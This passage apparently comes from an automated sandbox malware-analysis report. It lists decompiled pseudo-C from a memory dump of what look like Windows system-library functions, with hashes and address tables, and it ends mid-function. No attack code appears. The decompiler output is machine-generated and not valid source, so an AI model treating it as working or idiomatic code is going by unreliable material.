                                                        • Opcode Fuzzy Hash: d34b6704b6837455361e11c8e8c58d28033a21f8b3ebd0d4648f714bd40480cb
                                                        • Instruction Fuzzy Hash: 5E5180B1605355ABDB14DF68C840A6BB7E8AF98718F050E2EFA85D7240F774E90487A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0495E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E0495E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0495BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0495BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0495AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E048D9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0495A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0495A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E048D9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0495A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0495A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E048B2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E048AB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E048AFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E048B7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0494FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                        0x0495e547
                                                        0x0495e549
                                                        0x0495e54f
                                                        0x0495e553
                                                        0x0495e557
                                                        0x0495e55a
                                                        0x0495e55c
                                                        0x0495e55f
                                                        0x0495e561
                                                        0x0495e567
                                                        0x0495e56b
                                                        0x0495e7e2
                                                        0x00000000
                                                        0x0495e571
                                                        0x0495e575
                                                        0x0495e577
                                                        0x0495e57b
                                                        0x0495e57c
                                                        0x0495e57d
                                                        0x0495e57e
                                                        0x0495e57f
                                                        0x0495e588
                                                        0x0495e58f
                                                        0x0495e591
                                                        0x0495e592
                                                        0x0495e592
                                                        0x0495e596
                                                        0x0495e59e
                                                        0x0495e5a0
                                                        0x0495e5a6
                                                        0x0495e61d
                                                        0x0495e61d
                                                        0x0495e621
                                                        0x0495e623
                                                        0x0495e630
                                                        0x0495e630
                                                        0x0495e7e6
                                                        0x0495e7eb
                                                        0x0495e7ed
                                                        0x0495e7f4
                                                        0x0495e7fa
                                                        0x0495e7ff
                                                        0x0495e7ff
                                                        0x0495e80a
                                                        0x0495e812
                                                        0x0495e812
                                                        0x0495e5ab
                                                        0x0495e5b4
                                                        0x0495e5b9
                                                        0x0495e5be
                                                        0x0495e5c0
                                                        0x0495e5c2
                                                        0x0495e5c8
                                                        0x0495e5c9
                                                        0x0495e5cb
                                                        0x0495e5cc
                                                        0x0495e5d5
                                                        0x0495e5e4
                                                        0x0495e5f1
                                                        0x0495e5f8
                                                        0x0495e5f8
                                                        0x0495e5d5
                                                        0x0495e602
                                                        0x0495e616
                                                        0x0495e63d
                                                        0x0495e644
                                                        0x0495e64d
                                                        0x0495e652
                                                        0x0495e657
                                                        0x0495e659
                                                        0x0495e65b
                                                        0x0495e661
                                                        0x0495e662
                                                        0x0495e664
                                                        0x0495e665
                                                        0x0495e66e
                                                        0x0495e67d
                                                        0x0495e68a
                                                        0x0495e691
                                                        0x0495e691
                                                        0x0495e66e
                                                        0x0495e6b0
                                                        0x00000000
                                                        0x0495e6b6
                                                        0x0495e6bd
                                                        0x0495e6c7
                                                        0x0495e6d7
                                                        0x0495e6d9
                                                        0x0495e6db
                                                        0x0495e6de
                                                        0x0495e6e3
                                                        0x0495e6f3
                                                        0x0495e6fc
                                                        0x0495e700
                                                        0x0495e700
                                                        0x0495e704
                                                        0x0495e70a
                                                        0x0495e70a
                                                        0x0495e713
                                                        0x0495e716
                                                        0x0495e719
                                                        0x0495e720
                                                        0x0495e761
                                                        0x0495e76b
                                                        0x0495e774
                                                        0x0495e77a
                                                        0x0495e77a
                                                        0x0495e78a
                                                        0x0495e791
                                                        0x0495e799
                                                        0x0495e79b
                                                        0x0495e79f
                                                        0x0495e7aa
                                                        0x0495e7c0
                                                        0x0495e7ac
                                                        0x0495e7b2
                                                        0x0495e7b9
                                                        0x0495e7b9
                                                        0x0495e7c7
                                                        0x0495e806
                                                        0x00000000
                                                        0x0495e7c9
                                                        0x0495e7d1
                                                        0x0495e7d8
                                                        0x00000000
                                                        0x0495e7d8
                                                        0x00000000
                                                        0x00000000
                                                        0x0495e722
                                                        0x0495e72e
                                                        0x0495e748
                                                        0x0495e74c
                                                        0x0495e754
                                                        0x0495e756
                                                        0x0495e75c
                                                        0x0495e75c
                                                        0x00000000
                                                        0x0495e75c
                                                        0x0495e758
                                                        0x0495e758
                                                        0x00000000
                                                        0x0495e758
                                                        0x0495e750
                                                        0x00000000
                                                        0x00000000
                                                        0x0495e752
                                                        0x00000000
                                                        0x0495e752
                                                        0x0495e730
                                                        0x0495e735
                                                        0x0495e73d
                                                        0x0495e73f
                                                        0x00000000
                                                        0x00000000
                                                        0x0495e741
                                                        0x0495e741
                                                        0x00000000
                                                        0x0495e741
                                                        0x0495e739
                                                        0x00000000
                                                        0x00000000
                                                        0x0495e73b
                                                        0x00000000
                                                        0x0495e73b
                                                        0x0495e722
                                                        0x0495e720
                                                        0x0495e6b0
                                                        0x0495e618
                                                        0x00000000
                                                        0x0495e618

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction ID: b159630d8dfe8a2ee95fd609c2fe80a353598f97a6d11ffe7294d3d7ea5c2459
                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                        • Instruction Fuzzy Hash: EA915C716043419FEB24CF25C845B1BB7EAAFC4714F24892DF995CA2A0E775FA04CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049151BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E049151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x49705f0);
				E048ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E048AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E049153CA(0);
						return E048ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E048DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E048B3690(1, _t117, 0x4871810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E048DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L048B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E048DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0491500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E048D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                        0x049151be
                                                        0x049151c3
                                                        0x049151c8
                                                        0x049151cd
                                                        0x049151d0
                                                        0x049151d3
                                                        0x049151d8
                                                        0x049151db
                                                        0x049151de
                                                        0x049151e0
                                                        0x049151e3
                                                        0x049151e6
                                                        0x049151e8
                                                        0x04915342
                                                        0x04915351
                                                        0x04915356
                                                        0x0491535a
                                                        0x04915360
                                                        0x04915363
                                                        0x04915366
                                                        0x04915369
                                                        0x04915369
                                                        0x0491536b
                                                        0x0491536b
                                                        0x04915370
                                                        0x049153a3
                                                        0x049153a4
                                                        0x049153a6
                                                        0x049153ab
                                                        0x049153ab
                                                        0x049153ae
                                                        0x049153ae
                                                        0x049153b5
                                                        0x049153bf
                                                        0x049153bf
                                                        0x04915375
                                                        0x04915396
                                                        0x049153a0
                                                        0x049153a0
                                                        0x00000000
                                                        0x04915396
                                                        0x04915377
                                                        0x04915379
                                                        0x0491537f
                                                        0x0491538c
                                                        0x04915390
                                                        0x00000000
                                                        0x04915390
                                                        0x049151ee
                                                        0x049151f1
                                                        0x04915301
                                                        0x04915310
                                                        0x04915315
                                                        0x04915318
                                                        0x0491531b
                                                        0x04915320
                                                        0x0491532e
                                                        0x04915331
                                                        0x00000000
                                                        0x04915331
                                                        0x04915328
                                                        0x04915329
                                                        0x00000000
                                                        0x04915329
                                                        0x049151fa
                                                        0x04915235
                                                        0x04915236
                                                        0x04915239
                                                        0x0491523f
                                                        0x04915240
                                                        0x04915241
                                                        0x04915242
                                                        0x04915246
                                                        0x04915247
                                                        0x0491524e
                                                        0x04915251
                                                        0x04915267
                                                        0x04915269
                                                        0x0491526e
                                                        0x0491527d
                                                        0x0491527e
                                                        0x04915281
                                                        0x04915282
                                                        0x04915287
                                                        0x04915288
                                                        0x0491528a
                                                        0x0491528f
                                                        0x04915294
                                                        0x00000000
                                                        0x00000000
                                                        0x0491529a
                                                        0x0491529c
                                                        0x0491529e
                                                        0x0491529e
                                                        0x049152a4
                                                        0x049152b0
                                                        0x00000000
                                                        0x00000000
                                                        0x049152ba
                                                        0x049152bc
                                                        0x049152bc
                                                        0x049152d4
                                                        0x049152d9
                                                        0x049152dc
                                                        0x049152e1
                                                        0x00000000
                                                        0x00000000
                                                        0x049152e7
                                                        0x049152f4
                                                        0x00000000
                                                        0x049152f4
                                                        0x04915270
                                                        0x00000000
                                                        0x04915270
                                                        0x049151fc
                                                        0x049151fd
                                                        0x04915202
                                                        0x04915203
                                                        0x04915205
                                                        0x0491520a
                                                        0x0491520f
                                                        0x00000000
                                                        0x00000000
                                                        0x0491521b
                                                        0x04915226
                                                        0x0491522b
                                                        0x0491521d
                                                        0x0491521d
                                                        0x04915222
                                                        0x04915222
                                                        0x0491522d
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: 286be35f42c54ce43f9cb8f6b45f9df6e1362cc3e91bb510e851527d265e0b36
                                                        • Instruction ID: f17849c0bbed90da048bb0531d49beea495dd965f5e70a8b40b2e4ec257ac586
                                                        • Opcode Fuzzy Hash: 286be35f42c54ce43f9cb8f6b45f9df6e1362cc3e91bb510e851527d265e0b36
                                                        • Instruction Fuzzy Hash: F6519D71E00609EFDB24DFA8C840AADB7F9FB88714F56492DE509EB261D671E901CB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048BB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E048BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x498d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E048B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04968CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E048D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E048DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E048DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E048B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04968F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E048DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4988628; // 0x0
								_v68 = _t77;
								_t78 =  *0x498862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4988628; // 0x0
							_t116 =  *0x498862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                        0x048bb94c
                                                        0x048bb956
                                                        0x048bb95c
                                                        0x048bb95e
                                                        0x048bb964
                                                        0x048bb969
                                                        0x048bb96d
                                                        0x048bb96d
                                                        0x048bb970
                                                        0x048bb974
                                                        0x048bb97a
                                                        0x048bbadf
                                                        0x048bbadf
                                                        0x048bbae2
                                                        0x048bbae4
                                                        0x048bbae6
                                                        0x048bbaf0
                                                        0x04902cb8
                                                        0x048bbaf6
                                                        0x048bbaf6
                                                        0x048bbaf6
                                                        0x048bbafd
                                                        0x048bbb1f
                                                        0x048bbb1f
                                                        0x048bbaff
                                                        0x048bbb00
                                                        0x048bbb00
                                                        0x048bbb03
                                                        0x048bbb03
                                                        0x048bbacb
                                                        0x048bbacf
                                                        0x048bbad0
                                                        0x048bbad1
                                                        0x048bbadc
                                                        0x048bbadc
                                                        0x048bb980
                                                        0x048bb980
                                                        0x048bb988
                                                        0x048bb98b
                                                        0x048bb98d
                                                        0x048bb990
                                                        0x048bb993
                                                        0x048bb999
                                                        0x048bb99b
                                                        0x048bb9a1
                                                        0x048bb9a5
                                                        0x048bb9aa
                                                        0x048bb9b0
                                                        0x048bb9bb
                                                        0x048bb9c0
                                                        0x048bb9c3
                                                        0x048bb9ca
                                                        0x048bb9cc
                                                        0x048bb9cf
                                                        0x048bb9d3
                                                        0x048bb9d7
                                                        0x048bba94
                                                        0x048bba94
                                                        0x048bba98
                                                        0x048bbaa3
                                                        0x04902ccb
                                                        0x048bbaa9
                                                        0x048bbaa9
                                                        0x048bbaa9
                                                        0x048bbab1
                                                        0x04902cd5
                                                        0x04902cdd
                                                        0x04902cdd
                                                        0x048bbabb
                                                        0x048bbabc
                                                        0x048bbac2
                                                        0x048bbac3
                                                        0x048bbac3
                                                        0x048bbac6
                                                        0x00000000
                                                        0x048bb9dd
                                                        0x048bb9dd
                                                        0x048bb9e7
                                                        0x048bb9e7
                                                        0x048bb9ec
                                                        0x048bb9ec
                                                        0x048bb9f1
                                                        0x048bb9f5
                                                        0x048bb9fa
                                                        0x048bba00
                                                        0x048bba0c
                                                        0x048bba10
                                                        0x048bba10
                                                        0x048bba12
                                                        0x048bba18
                                                        0x00000000
                                                        0x00000000
                                                        0x048bbb26
                                                        0x048bbb26
                                                        0x048bba1e
                                                        0x048bba1e
                                                        0x048bba23
                                                        0x048bba25
                                                        0x048bba2c
                                                        0x048bba30
                                                        0x048bba35
                                                        0x048bba35
                                                        0x048bba41
                                                        0x048bba46
                                                        0x048bba4c
                                                        0x048bba50
                                                        0x048bba54
                                                        0x048bba6a
                                                        0x048bba6e
                                                        0x048bba70
                                                        0x048bba74
                                                        0x048bba78
                                                        0x048bba7a
                                                        0x048bba7c
                                                        0x048bba8e
                                                        0x048bba90
                                                        0x048bba92
                                                        0x048bbb14
                                                        0x048bbb14
                                                        0x048bbb16
                                                        0x048bbb16
                                                        0x00000000
                                                        0x048bba7c
                                                        0x048bbb0a
                                                        0x048bbb0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048bbb0f

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048BB9A5
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 885266447-0
                                                        • Opcode ID: 21f1e751784d1315b990c229f42f25c79503402815c45f183992df2bfab1d7f9
                                                        • Instruction ID: 3a8c78e7f51accc0e38602d39552662c0264e659818d584e5b9735561a5e554c
                                                        • Opcode Fuzzy Hash: 21f1e751784d1315b990c229f42f25c79503402815c45f183992df2bfab1d7f9
                                                        • Instruction Fuzzy Hash: DF513271A097408FC720DF28C48092ABBE9BB88614F548E6EE9D5D7754E770F884CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E0489B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x496f7a8);
				E048ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
